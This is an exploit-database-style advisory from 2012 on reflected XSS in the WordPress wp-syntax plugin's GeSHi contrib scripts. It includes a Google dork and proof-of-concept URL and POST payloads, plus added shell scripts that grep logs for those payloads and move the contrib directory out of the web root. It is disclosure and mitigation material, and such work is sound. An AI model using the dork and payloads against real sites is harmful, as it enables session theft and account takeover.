
24 Sep 2012

WordPress Plugin wp-syntax (default installation) Cross Site Scripting (XSS)

################################################################
# Exploit Title: Wordpress Plugin wp-syntax (default installation) Cross Site Scripting (XSS)
# Google Dork: inurl:wp-content/plugins/wp-syntax
# Date: 24/09/12
# Exploit Author: MondoUnix
# Site: http://www.mondounix.com
# Software : wordpress wp-syntax plugin
################################################################
 
Vulnerability description
The scripts listed below are possibly vulnerable to Cross Site Scripting (XSS) attacks.

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted, it executes the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.

This vulnerability affects:
/wp-content/plugins/wp-syntax/geshi/contrib/example.php
/wp-content/plugins/wp-syntax/geshi/contrib/langwiz.php

The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
 
POC (Proof of concept) :
 
# example.php
 
http://SITE/wp-content/plugins/wp-syntax/geshi/contrib/example.php/%F6%22%20onmouseover=prompt(942420)%20
 
# langwiz.php
 
URL encoded POST input ld%5bcmt%5d%5bsl%5d%5b2%5d%5bstart%5d was set to '"()&%1<ScRiPt >prompt(977197)</ScRiPt>
URL encoded POST input ld%5bstr%5d%5bec%5d%5bstyle%5d was set to '"()&%1<ScRiPt >prompt(936249)</ScRiPt>
URL encoded POST input ld%5bcmt%5d%5brxc%5d%5b1%5d%5bstyle%5d was set to '"()&%1<ScRiPt >prompt(939475)</ScRiPt>
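The following shell script is added here as an example and is not part of the advisory. It shows how an administrator can check a web server access log for requests that touch the two contrib scripts listed above, and then narrow those to requests whose URL carries script-like content of the kind shown in the POC. The log lines are constructed for the demonstration (they are not real traffic), and the function names contrib_requests, contrib_payload_requests and count_lines are this example's own.

```shell
#!/bin/sh
# Added example (not from the original advisory): flag access-log requests
# aimed at the GeSHi contrib scripts named in the advisory. Paths follow the
# advisory; the log lines are constructed sample data, not real traffic.

# Constructed sample of Apache combined-format log lines (not real traffic).
SAMPLE_LOG='203.0.113.5 - - [24/Sep/2012:10:01:02 +0200] "GET /wp-content/plugins/wp-syntax/geshi/contrib/example.php/%F6%22%20onmouseover=prompt(942420)%20 HTTP/1.1" 200 1534
203.0.113.5 - - [24/Sep/2012:10:01:09 +0200] "POST /wp-content/plugins/wp-syntax/geshi/contrib/langwiz.php HTTP/1.1" 200 2210
198.51.100.7 - - [24/Sep/2012:10:02:30 +0200] "GET /wp-content/plugins/wp-syntax/wp-syntax.css HTTP/1.1" 200 812
198.51.100.7 - - [24/Sep/2012:10:02:31 +0200] "GET /2012/09/post-title/ HTTP/1.1" 200 9120'

# Print every request line that touches the contrib scripts. Any hit is
# worth reviewing: the example files have no legitimate use on a live site.
contrib_requests() {
    printf '%s\n' "$SAMPLE_LOG" |
        grep -E '"(GET|POST) [^" ]*/wp-syntax/geshi/contrib/(example|langwiz)\.php'
}

# Narrow to hits whose URL carries script-like content (an event handler,
# a script tag, or their percent-encoded forms). POST bodies are not written
# to a standard access log, so the langwiz.php request above is caught only
# by the path match in contrib_requests, not by this filter.
contrib_payload_requests() {
    contrib_requests |
        grep -iE 'on[a-z]+=|<script|%3cscript|prompt\(|alert\('
}

# Count helper, handy when wiring the checks into a cron job.
count_lines() { wc -l | tr -d ' '; }

# Example run:
#   contrib_requests | count_lines          -> 2
#   contrib_payload_requests | count_lines  -> 1
```

To run this against a real log, replace the printf of SAMPLE_LOG with a read of the access log file; the two grep patterns are the part to keep. A hit on the path alone is enough to act on, since after the contrib directory is removed (see the solution below) no legitimate request should reach it.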
 
Solution:

Remove the plugin's default "contrib" directory (wp-content/plugins/wp-syntax/geshi/contrib) from the web root, or move it to a secure location outside the web root if you want to keep a backup copy.
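The shell script below is an added example, not part of the advisory, that applies the solution above: it moves GeSHi's contrib directory out of the WordPress web root into a backup location, refuses a backup location that is itself inside the web root (the files would stay reachable), and offers a check that the two vulnerable scripts are gone. The function names quarantine_contrib and contrib_present and the WP_ROOT / BACKUP_DIR arguments are this example's own; set them to your own paths.

```shell
#!/bin/sh
# Added example, not part of the advisory: quarantine the wp-syntax GeSHi
# "contrib" directory outside the web root. Usage:
#   quarantine_contrib /var/www/html /srv/backups   (paths are assumptions)

CONTRIB_REL='wp-content/plugins/wp-syntax/geshi/contrib'

# quarantine_contrib WP_ROOT BACKUP_DIR
# Returns 0 when the directory was moved, 2 when it was already absent,
# 1 on error (including a backup location inside the web root).
quarantine_contrib() {
    wp_root=$1
    backup_dir=$2
    src="$wp_root/$CONTRIB_REL"

    if [ ! -d "$src" ]; then
        echo "contrib directory not present: $src"
        return 2
    fi

    mkdir -p "$backup_dir" || return 1

    # Resolve both paths physically so a relative or symlinked backup
    # location cannot slip back under the document root.
    root_abs=$(cd "$wp_root" && pwd -P)
    backup_abs=$(cd "$backup_dir" && pwd -P)
    case "$backup_abs" in
        "$root_abs"/*)
            echo "refusing: backup dir $backup_abs is inside the web root" >&2
            return 1 ;;
    esac

    stamp=$(date +%Y%m%d-%H%M%S)
    dest="$backup_dir/wp-syntax-contrib-$stamp"
    mv "$src" "$dest" || return 1
    echo "moved $src -> $dest"
}

# contrib_present WP_ROOT
# Returns 0 while either vulnerable script is still under the web root.
contrib_present() {
    [ -f "$1/$CONTRIB_REL/example.php" ] || [ -f "$1/$CONTRIB_REL/langwiz.php" ]
}
```

Run quarantine_contrib once per WordPress install, then contrib_present to confirm; re-run both after any upgrade of the plugin, since an update can restore the directory.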
 
# www.mondounix.com


Comments (2) Trackbacks (0)
  1. A few days ago someone injected code into some of my WordPress files and, as it happens, I have this plugin and the contrib folder… I think it was the work of a hashing scanner :-|

    • Besides targeted scans, they may have used simple automated tools to find security holes.
      I recommend installing mod_security (for apache) and fail2ban.
      Read the documentation carefully and check the configuration (the default one can be "blocking").


